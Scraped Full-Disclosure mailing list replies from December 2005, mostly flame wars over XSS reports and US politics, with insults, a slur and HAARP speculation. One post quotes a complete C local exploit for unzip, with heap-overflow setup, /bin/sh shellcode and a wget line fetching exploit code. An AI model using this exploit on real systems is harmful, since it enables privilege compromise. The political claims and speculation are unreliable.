lol you wont ever give up kiddie dont you ? i do not care about google and yahoo vulnerabilities. i agree to leave you alone, but you ask for it again and again so be it. 1 person said its ok for the xss vuln. you cant even count or did you see any other mails ? how about the tons of people the constantly tell you to shut the fuck up since we are all tired of you. you say the same shit over and over again. if someone tells you facts then you ignore it, because you have no other arguments as that someone else wouldnt have found lame xss bugs in google or yahoo and therefore they shouldnt be allowed on this list. you are the last person to even dare to say something like this. you have nothing else to say then that people would be jealous of you or how precious your lame xss bugs are. noone cares about your shitty vulnerabilities you found as it doesnt require any skill at all to find those. show us some code! how many exploits did you write ? you are so blinded by your ego that you dont realize how much crap you talk and how you destory your imaginary reputation yourself. why do you think there have been so many mails against you? its not because of your xss lameness. if you would have simply provided them to the list noone would have bothered, but you have to brag how special they would make you. then you think you would be one of the most respected security researchers out there, but noone knows you. you are so pathetic its unbeliveable. pull the stick out of your ass and get lost kid. - Original Message - From: n3td3v [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 21, 2005 6:16 PM Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security [EMAIL PROTECTED] wrote: yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding to the noise, but its just too tempting. i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist. btw my name is not groundzero, thats my company :) greetz -sk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities in Google.com
i did provide a real exploit before here and before you point the finger on others, we didnt see anything coming from you at all did we ? - Original Message - From: Edward Pearson [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, December 21, 2005 6:41 PM Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com Why has this become a trolling? if noone tell him what a stupid fag he is Are we back at fucking middle school? Have we decended to the level of 10 year olds?? Ground Zero, I've seen your company website(s) and your products. All I say is I think you have several very good resons to pay FUCKING close attention to what is said on this list. Work it out. The only people who seem hell bent on ruining this list for everyone are: InfoSecBOFH n3td3v Ground Zero Security None of these people have anything to bring to the table. Lets see at least one real vuln report/exploit from one of you, and then the other two have to concentrate on growing up enough to not troll it or make stupid pre-school comments. Come on guys!!! I'm beginning to thing that actually you're not bigger than this... Ultimatly, if you've got problems with each other, do it on MSN, AIM, IRC, USENET whatever, just not my inbox. Have a fucking excellent day. - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this chump is going round putting a black mark by it) -Original Message-e From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: 21 December 2005 17:17 To: GroundZero Security; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security [EMAIL PROTECTED] wrote: yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding to the noise, but its just too tempting. i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist. btw my name is not groundzero, thats my company :) greetz -sk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] N3td3v poll
where is your brain oh senseless one - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, December 21, 2005 12:45 AM Subject: Re: [Full-disclosure] N3td3v poll Wheres your Google and Yahoo vulnerabilities fdlister? I await your reply, oh jealous one. ;-) http://n3td3v.blogspot.com http://geocities.com/n3td3v http://groups.google.com/group/n3td3v On 12/20/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: http://snappoll.com/poll/50150.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unzip *ALL* verisons ;))
LOL! - Original Message - From: KF (lists) [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 10:42 PM Subject: Re: [Full-disclosure] Unzip *ALL* verisons ;)) Im thinking this is a pretty old school bug... this is damn old code I believe. I know its something I found while working at Snosoft but I have no clue when. /* By DVDMAN ([EMAIL PROTECTED])[EMAIL PROTECTED] http://www.snosoft.com http://WWW.L33TSECURITY.COM L33T SECURITY Keep It Private based on code by hackbox.ath.cx wget http://hackbox.ath.cx/mizc/unzip-expl.c lame unzip = 5.50 tested on redhat 7.2 By DVDMAN L33TSECURITY.COM */ #include stdio.h #include unistd.h #include stdlib.h #define MAX \x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30 #define BUF 3264+1900+2 #define LOC 3262 #define OFFSET 700 // brute force it char fakechunk[] = \xf0\xff\xff\xff \xfc\xff\xff\xff \xde\x16\xe8\x77 \x42\x6c\xe8\x77; char execshell[] = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89 \xc2\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\x40 \xcd\x80; /* newroot's shellcode */ int main (int argc, char *argv[]) { char buf[BUF + 1]; int x; char *ptr; int i=0,offset=OFFSET; unsigned long addy = 0xbab0; if (argc 2) { printf([L33TSECURITY]); printf(UNZIP EXPLOIT BY DVDMAN ); printf([L33TSECURITY]\n); printf([Usage] %s Offset\n,argv[0]); return; } if (argc 1) offset = atoi(argv[1]); memset(buf,0x90,BUF); ptr = buf + ((BUF) - strlen(execshell)); for (i=0;istrlen(execshell);i++) *(ptr++) = execshell[i]; *(long*)buf[LOC] = addy + offset; *(long*)buf[LOC+4] = addy + offset; buf[BUF] = 0; if (buf MAX) { x = atoi(fakechunk + 2); memset(buf,x,BUF); execl(/usr/bin/unzip,unzip,buf,NULL); } execl(/usr/bin/unzip,unzip,buf,fakechunk,NULL); return; } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd)
what a load of bullshit... that 9/11 thing seems to be the execuse for everything now ? it was an terrorist act yet usa starts to invade any country that could be the home of those terrorist guys. well its bad what happened and i dont support it at all, but its not the fault of some countries that 9/11 happened. if bush keeps messing around like that, the whole world will hate him, but he doesnt care since he just invades any country that seems to be trouble for him by making up false execuses. i think iran is next. look at those camps everywhere, where people get locked up even if they are innocent. it reminds me of what my country did in ww2 ..really disgusting. the sad thing is, that noone can do anything about it. everywhere around the world people are uppset about the u.s gov, but non of them wants to step up. ah fuck it ..this has been discussed already a dozen times and no need to bring that in to the FD list. i just dont get what 9/11 has to do with the original topic, but as i said it seems to be the execuse for anything nowdays btw our company name has nothing to do with 911 :-P i wonder how many echelon sensors start to monitor this thread haha. -sk Http://www.groundzero-security.com - Original Message - From: [EMAIL PROTECTED] To: Full-Disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 4:07 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd) This is very nice, but obviously you were not standing in the dust of the WTC Sept 11. I don't care if we NUKE them, let alone hurting a few feelings state side. You are from Missouri so Show me the proof that any citizens' rights were violated other than the liberal press stirring the soup again, or please keep your political paranoia to yourself. BTW: Al Gore lost twice get over it. -- vote for me -- Original message -- From: J.A. Terranson [EMAIL PROTECTED] Forwarded because we're fucking tired of hearing about n3td3v. -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF Just once, can't we have a nice polite discussion about the logistics and planning side of large criminal enterprise? - Steve Thompson --- begin forwarded text Delivered-To: cryptography@metzdowd.com To: cryptography@metzdowd.com Subject: A small editorial about recent events. From: Perry E. Metzger [EMAIL PROTECTED] Date: Sun, 18 Dec 2005 13:58:06 -0500 Sender: [EMAIL PROTECTED] A small editorial from your moderator. I rarely use this list to express a strong political opinion -- you will forgive me in this instance. This mailing list is putatively about cryptography and cryptography politics, though we do tend to stray quite a bit into security issues of all sorts, and sometimes into the activities of the agency with the biggest crypto and sigint budget in the world, the NSA. As you may all be aware, the New York Times has reported, and the administration has admitted, that President of the United States apparently ordered the NSA to conduct surveillance operations against US citizens without prior permission of the secret court known as the Foreign Intelligence Surveillance Court (the FISC). This is in clear contravention of 50 USC 1801 - 50 USC 1811, a portion of the US code that provides for clear criminal penalties for violations. See: http://www.law.cornell.edu/uscode/html/uscode50/usc_sup_01_50_10_36_20_I.html The President claims he has the prerogative to order such surveillance. The law unambiguously disagrees with him. There are minor exceptions in the law, but they clearly do not apply in this case. They cover only the 15 days after a declaration of war by congress, a period of 72 hours prior to seeking court authorization (which was never sought), and similar exceptions that clearly are not germane. There is no room for doubt or question about whether the President has the prerogative to order surveillance without asking the FISC -- even if the FISC is a toothless organization that never turns down requests, it is a federal crime, punishable by up to five years imprisonment, to conduct electronic surveillance against US citizens without court authorization. The FISC may be worthless at defending civil liberties, but in its arrogant disregard for even the fig leaf of the FISC, the administration has actually crossed the line into a crystal clear felony. The government could have legally conducted such wiretaps at any time, but the President chose not to do it legally. Ours is a government of laws, not of men. That means if the President disagrees with a law or feels that it is insufficient, he still must obey it. Ignoring the law is illegal, even for the President. The President may ask Congress to change the law, but
Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd)
we in the USA are still the luckiest people on Earth. i would not count on that. i feel much saver/happy here in germany. We've got it better than any other country on Earth. lol yeah right.. in your dreamworld maybe. did you even leave usa before ? i doubt that. If you like some other place better, please feel free to move yourself there. yes thank you! i like it much more here in my country so i stay :-) i just have to fear that usa starts to take over the world thats all i have to worry about here. - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 5:04 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd) I'm sorry, but I was also FAR too close to one of the 09/11 attacks. While I agree that giving up (supposedly) certain civil liberties is most decidedly not a good thing, we need to remember one key point - the same liberal whiners that are complaining about the monitoring of certain targeted individuals would be shitting themselves to get in line to scream about the President not doing enough to protect us if there was another attack. This was not a blanket wiretap against every citizen that made a telephone call to London. These taps were conducted under defined circumstances. If you are not a terrorist, and do not associate with terrorists, you have nothing to worry about. The indignation being shown by the liberals right now is shocking - this information was not news to anyone within Congress (from either party) that was in a position to know it. What good are civil liberties if you are being buried in a mass grave as a victim of another terrorist attack? Are you going to try to exercise your freedom of speech from beyond the grave? I like Perry - he used to work for me back in the 90's, but he is wrong about this. I know all of the cliches about freedom never being lost all at once, and societies willing to trade freedom for security deserving neither and having none (I know I butchered that one - my apologies to the original author), and all of the other little jabs that liberals are falling back on right now, but like him or not, there has not been another attack on our homeland since 09/11. Difficult decisions need to be made from time to time, and Bush is making them. I think it's hysterical that most of the loudest of the loudmouths were strangely silent when Clinton did many of the same things. Even with a government that is actively protecting us from these terrorist scumbags, we in the USA are still the luckiest people on Earth. We've got it better than any other country on Earth. If you like some other place better, please feel free to move yourself there. JCP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd)
indeed and thats not the onlyone. in iraq some cap driver got carried away because his customer happened to be a terrorist. how should he know ? he got taken to some prisoner camp, tortured for 3 months and then when they noticed he isnt a terrorist but an ordinary taxi driver, he got sent back home the same whey he got carried away - in chains. so much for human rights. thats why those camps arent in usa so u.s law doesnt count. its really sad that something like those camps is still possible in our modern times. - Original Message - From: J.A. Terranson [EMAIL PROTECTED] To: Jamie C. Pole [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 5:17 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd) On Sun, 18 Dec 2005, Jamie C. Pole wrote: If you are not a terrorist, and do not associate with terrorists, you have nothing to worry about. Like the guy we kidnapped in Germany, tortured for a year and then released with a Oh, wrong guy. Sorry.? -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF Just once, can't we have a nice polite discussion about the logistics and planning side of large criminal enterprise? - Steve Thompson ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Clips] A small editorial about recentevents.(fwd)
well at least our tax money goes back into our own country for the infrastructure etc and wont be used to kill innocent people. remind me again, how much does your gov spend a year on war industry ? why the hell do you need so many nukes ? but then bitch if some other country starts to build some. of course since now you can show off with them and if some country is really pissing you off, hell then you nuke em. of course if any other country would do the same the us gov would bitch too and point fingers. since once a country got nukes too usa gets afraid that their actions could have results in their own country. normally its like usa plays war and at home nothing happens, but if someone ever manages to hit their country then they'd be whining. reminds me of a really funny thing in iraq war, they send in high tech soldiers but then start to whine on tv on how about its unfair that the iraqies got night visions (i belive from the russians but i'm not sure). oh and i just saw your last mail: We are not looking for leibensraum - we are just looking to be safe. yeah right as if that would be true :P your gov knows that war pays off. many many wars you where in didnt have anything todo with the savety of your own country. Given the history of terrorist activity in Germany, I'm really surprised that you feel the way you do - lol you mean the RAF stuff ? that was ages ago and we learned from that. or in the 70s at olympia. sure that was bad since we didnt even have special forces as we werent used to terrorists or war anymore we usually dont bother about such things. usa is mainly focused on war industry though. your government is benefitting from the intelligence that is being gathered as well. Thankfully, Ms. Merkel seems to understand that. well sure if you may fed us some pieces but afterall you guys spy on us too or why do we have an nsa echelon station sitting here in germany ? hm isnt nsa for national security only why do they opperate international ? (yes google earth is fun - look near munich its even named) maybe i'm wrong but i'm not familiar with all your agencies and what they are for. you cant make us belive that you aint listening on us. funny thing is also that usa say's they would not spy on other countries. i really wonder that by the amount of lies and propaganda comming from your gov that you feel the way you do. but thats because your in it i guess. your working directly for the gov/mil as far as it seems? - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 5:18 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recentevents.(fwd) Was that a joke? I love Germany (it's one of the 24 countries that I have worked in, by the way), but be realistic. All ethnocentrism aside, I'm not sure that welfare economies that tax the living daylights out of those lucky enough to have a job are a good idea. JCP On Dec 18, 2005, at 10:14 PM, GroundZero Security wrote: we in the USA are still the luckiest people on Earth. i would not count on that. i feel much saver/happy here in germany. We've got it better than any other country on Earth. lol yeah right.. in your dreamworld maybe. did you even leave usa before ? i doubt that. If you like some other place better, please feel free to move yourself there. yes thank you! i like it much more here in my country so i stay :-) i just have to fear that usa starts to take over the world thats all i have to worry about here. - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 5:04 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd) I'm sorry, but I was also FAR too close to one of the 09/11 attacks. While I agree that giving up (supposedly) certain civil liberties is most decidedly not a good thing, we need to remember one key point - the same liberal whiners that are complaining about the monitoring of certain targeted individuals would be shitting themselves to get in line to scream about the President not doing enough to protect us if there was another attack. This was not a blanket wiretap against every citizen that made a telephone call to London. These taps were conducted under defined circumstances. If you are not a terrorist, and do not associate with terrorists, you have nothing to worry about. The indignation being shown by the liberals right now is shocking - this information was not news to anyone within Congress (from either party) that was in a position to know it. What good are civil liberties if you are being buried in a mass grave as a victim of another terrorist attack? Are you going to try to exercise your freedom of speech from beyond the grave? I like Perry - he used to work
Re: [Full-disclosure] [Clips] A small editorial about recentevents.(fwd)
lol you mean the RAF stuff ? that was ages ago and we learned from that. or in the 70s at olympia. sure that was bad since we didnt even have special forces as we werent used to terrorists or war anymore we usually dont bother about such things. usa is mainly focused on war industry though ok sorry i didnt finish this. i didn't have much sleep last night so execuse me please. what i missed is that we didnt have special forces but we have some now. and i'm very confident they would do a good job. also if we have a disaster we dont have to wait 6 days for help to arrive i trust my gov on that. i feel pretty save also if a terrorist attack would happen we surely would not invade a country. unless that countries gov is attacking us. - Original Message - From: GroundZero Security [EMAIL PROTECTED] To: Jamie C. Pole [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 5:51 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recentevents.(fwd) well at least our tax money goes back into our own country for the infrastructure etc and wont be used to kill innocent people. remind me again, how much does your gov spend a year on war industry ? why the hell do you need so many nukes ? but then bitch if some other country starts to build some. of course since now you can show off with them and if some country is really pissing you off, hell then you nuke em. of course if any other country would do the same the us gov would bitch too and point fingers. since once a country got nukes too usa gets afraid that their actions could have results in their own country. normally its like usa plays war and at home nothing happens, but if someone ever manages to hit their country then they'd be whining. reminds me of a really funny thing in iraq war, they send in high tech soldiers but then start to whine on tv on how about its unfair that the iraqies got night visions (i belive from the russians but i'm not sure). oh and i just saw your last mail: We are not looking for leibensraum - we are just looking to be safe. yeah right as if that would be true :P your gov knows that war pays off. many many wars you where in didnt have anything todo with the savety of your own country. Given the history of terrorist activity in Germany, I'm really surprised that you feel the way you do - lol you mean the RAF stuff ? that was ages ago and we learned from that. or in the 70s at olympia. sure that was bad since we didnt even have special forces as we werent used to terrorists or war anymore we usually dont bother about such things. usa is mainly focused on war industry though. your government is benefitting from the intelligence that is being gathered as well. Thankfully, Ms. Merkel seems to understand that. well sure if you may fed us some pieces but afterall you guys spy on us too or why do we have an nsa echelon station sitting here in germany ? hm isnt nsa for national security only why do they opperate international ? (yes google earth is fun - look near munich its even named) maybe i'm wrong but i'm not familiar with all your agencies and what they are for. you cant make us belive that you aint listening on us. funny thing is also that usa say's they would not spy on other countries. i really wonder that by the amount of lies and propaganda comming from your gov that you feel the way you do. but thats because your in it i guess. your working directly for the gov/mil as far as it seems? - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 5:18 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recentevents.(fwd) Was that a joke? I love Germany (it's one of the 24 countries that I have worked in, by the way), but be realistic. All ethnocentrism aside, I'm not sure that welfare economies that tax the living daylights out of those lucky enough to have a job are a good idea. JCP On Dec 18, 2005, at 10:14 PM, GroundZero Security wrote: we in the USA are still the luckiest people on Earth. i would not count on that. i feel much saver/happy here in germany. We've got it better than any other country on Earth. lol yeah right.. in your dreamworld maybe. did you even leave usa before ? i doubt that. If you like some other place better, please feel free to move yourself there. yes thank you! i like it much more here in my country so i stay :-) i just have to fear that usa starts to take over the world thats all i have to worry about here. - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 5:04 AM Subject: Re: [Full-disclosure] [Clips] A small editorial about recent events.(fwd
Re: [Full-disclosure] [Clips] A small editorial aboutrecentevents.(fwd)
i doubt that you can blame all on 1 or 2 persons and especially when a disaster is happening. isnt it sad if your gov can help its military units in 24 hrs anywhere in the world but it takes more than 6 days for normal people right inside the country ? making up execuses wont help this was simply a failure of your system. what about the help germany offered ? your gov was rude and didnt even answer us. we offered help the first day. without your answer we sent water cleaning devices with ships, but still after 6 days you didnt care about them. your not funny with your sarcasm ..but hey i wouldnt be surprised if your gov caused such a disaster with one of their stupid tests to mess with the weather by shooting microwaves or something into the ionosphere. they admited that they dont know what could happen. nice one. wasnt it HAARP ? i'v been reading about it a while ago but i dont really remember. i'm not saying that this happened or anything but research is done. actually would be really funny if they caused it themselfs and i wouldnt be surprised. but hey lets forget about this and go back to the original topic, shall we ? - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 6:07 AM Subject: Re: [Full-disclosure] [Clips] A small editorial aboutrecentevents.(fwd) Our Federal government cannot enter a disaster area unless invited by the governor of the state. In the case of Katrina, the governor was more concerned with getting re-elected than she was with saving her constituents. Her recently-disclosed email messages prove this. Also, the mayor ordered a mandatory evacuation (when it was too late to enforce), but most people didn't leave. If you place yourself in harms way, is it the government's responsibility to extricate you? The head of FEMA was a bonehead, but that problem has been fixed. Are you now going to tell me that the US Army Corps of Engineers went into New Orleans to blow holes in the levees? Or maybe we caused hurricane Katrina with our special nuclear-powered hurricane-generators? Just checking... Jamie On Dec 18, 2005, at 10:56 PM, GroundZero Security wrote: lol you mean the RAF stuff ? that was ages ago and we learned from that. or in the 70s at olympia. sure that was bad since we didnt even have special forces as we werent used to terrorists or war anymore we usually dont bother about such things. usa is mainly focused on war industry though ok sorry i didnt finish this. i didn't have much sleep last night so execuse me please. what i missed is that we didnt have special forces but we have some now. and i'm very confident they would do a good job. also if we have a disaster we dont have to wait 6 days for help to arrive i trust my gov on that. i feel pretty save also if a terrorist attack would happen we surely would not invade a country. unless that countries gov is attacking us. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd)
If you are complaining that the Federal government violated the law and conducted illegal wiretaps, please explain why it would have been okay for the Federal government to break the law by invading Louisiana and taking over relief operations? let me put it this way. if you break the law to rescue people noone would bitch about it. that always happens that people bend the rules to rescue people. thats perfectly fine but invading someones privacy is something different. the usa can invade any other country, but refuses to invade one of their own states for the only purpose to help its people without weapons but food? thats redicilous. the usa got so much power under their ass, but you want to tell me that the gov cant do anything if one of its states refuses help ? if the gov really would have wanted they could have helped. well at least you seem to agree on that this is wrong. And had he done that, the liberals would very likely now be asking whether or not it was legal for him to have done so. For the people that hate President Bush, nothing he does or does not do will be acceptable. It's as simple as that. sure, but if he would have done that it would be way less people bitching. the whole world would have seen bush or the u.s gov cares so much about their peoples lifes and safety that they bend the rules in order to protect them. for once bush could have had a good picture in the world media. so while you would have a handfull that hate bush anyways arguing about the law (which wouldnt help them as the u.s. court wouldnt listen), you now got the whole world asking why the fuck they didnt react and tons of american people who feel left alone. i feel sorry for those poor americans. soon your rights will be all gone because 'It's just a goddamned piece of paper' no ? - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 7:15 AM Subject: Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd) You just hit the nail right on the head! You CANNOT blame everything on 1 person - including George W. Bush. Our system absolutely did fail - there is no excusing that fact. There is also no excusing the ignorance of people that want to blame all of the world's woes on George W. Bush. As far as the reason it failed (using the hurricane example that you brought up), let's examine some history. Prior to World War I, there was a country-state called Bavaria - you might know where it is. Bavaria had its own king, it's own military, and its own laws. What would have happened if some German leader invaded Bavaria to solve a problem? Now, in modern days, we have a state called Louisiana. It has its own governor, its own military, and its own laws. Louisiana had a natural disaster, and their governor refused all help from the Federal government. The governor's staff also refused all offers for help. The Federal government did not invade Louisiana because the governor and her staff flatly denied that they needed any help. Meanwhile, the governor of Louisiana and her staff were allowing their constituents to die. If you are complaining that the Federal government violated the law and conducted illegal wiretaps, please explain why it would have been okay for the Federal government to break the law by invading Louisiana and taking over relief operations? Sorry if this seems simplistic to you, but if the action saves lives, I'm not really going to cry too much about the government breaking a few occasional laws. I don't like it, but I understand why it is sometimes necessary. And by the way, I believe that President Bush should have militarized New Orleans when the mayor ignored the signs that the hurricane was going to strike his city. The mandatory evacuation should have been enforced by the military, and quite a few less people would have died. And had he done that, the liberals would very likely now be asking whether or not it was legal for him to have done so. For the people that hate President Bush, nothing he does or does not do will be acceptable. It's as simple as that. Jamie On Dec 18, 2005, at 11:48 PM, GroundZero Security wrote: i doubt that you can blame all on 1 or 2 persons and especially when a disaster is happening. isnt it sad if your gov can help its military units in 24 hrs anywhere in the world but it takes more than 6 days for normal people right inside the country ? making up execuses wont help this was simply a failure of your system. what about the help germany offered ? your gov was rude and didnt even answer us. we offered help the first day. without your answer we sent water cleaning devices with ships, but still after 6 days you didnt care about them. your not funny with your sarcasm ..but hey i
[Full-disclosure] Re: Report to Recipient(s): Banned Content
uh oh, looks like i was right and the echelon sensors go off with this thread. neh just joking :) - Original Message - From: [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 8:08 AM Subject: Report to Recipient(s): Banned Content Incident Information:- Originator: [EMAIL PROTECTED] Recipients: GroundZero Security [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk Subject:Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd) Message from [EMAIL PROTECTED] was quarantined because it contained banned content. If it is urgent that you receive this message in the next 4 hours, please call the IT Support Center at ext. 303-969- and open a trouble ticket. Please NOTE emails from subscription services and personal emails will not be forwarded. Message from [EMAIL PROTECTED] was quarantined because it contained banned content. If it is urgent that you receive this message in the next 4 hours, please call the IT Support Center at ext. 303-969- and open a trouble ticket. Please NOTE emails from subscription services and personal emails will not be forwarded. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd)
yeah if i still care in 25 years then we'll see. is everything going to be declassified after 25 years in usa ? or does certain stuff stay classified ? i dont know how that works overthere so i thought i'd ask :) - Original Message - From: Jamie C. Pole [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 8:06 AM Subject: Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd) Okay. Here is the fundamental problem - we do not know the circumstances under which the extralegal wiretaps were conducted. It is highly likely that the wiretaps did save lives - maybe even German lives. That is the point I have been trying to make all night. There are certain aspects of the operations of any government (even a Republic like the USA) that the general citizenry does not need to be privy to. I believe this to be one of those aspects. When this material is declassified in 25 years, we'll all know whether or not this was worth it. You are not going to convince me that my country is an evil place with designs on controlling or destroying the entire world, and I'm obviously not going to convince you that it isn't. Jamie On Dec 19, 2005, at 12:29 AM, GroundZero Security wrote: let me put it this way. if you break the law to rescue people noone would bitch about it. that always happens that people bend the rules to rescue people. thats perfectly fine but invading someones privacy is something different. the usa can invade any other country, but refuses to invade one of their own states for the only purpose to help its people without weapons but food? thats redicilous. the usa got so much power under their ass, but you want to tell me that the gov cant do anything if one of its states refuses help ? if the gov really would have wanted they could have helped. well at least you seem to agree on that this is wrong. And had he done that, the liberals would very likely now be asking whether or not it was legal for him to have done so. For the people that hate President Bush, nothing he does or does not do will be acceptable. It's as simple as that. sure, but if he would have done that it would be way less people bitching. the whole world would have seen bush or the u.s gov cares so much about their peoples lifes and safety that they bend the rules in order to protect them. for once bush could have had a good picture in the world media. so while you would have a handfull that hate bush anyways arguing about the law (which wouldnt help them as the u.s. court wouldnt listen), you now got the whole world asking why the fuck they didnt react and tons of american people who feel left alone. i feel sorry for those poor americans. soon your rights will be all gone because 'It's just a goddamned piece of paper' no ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd)
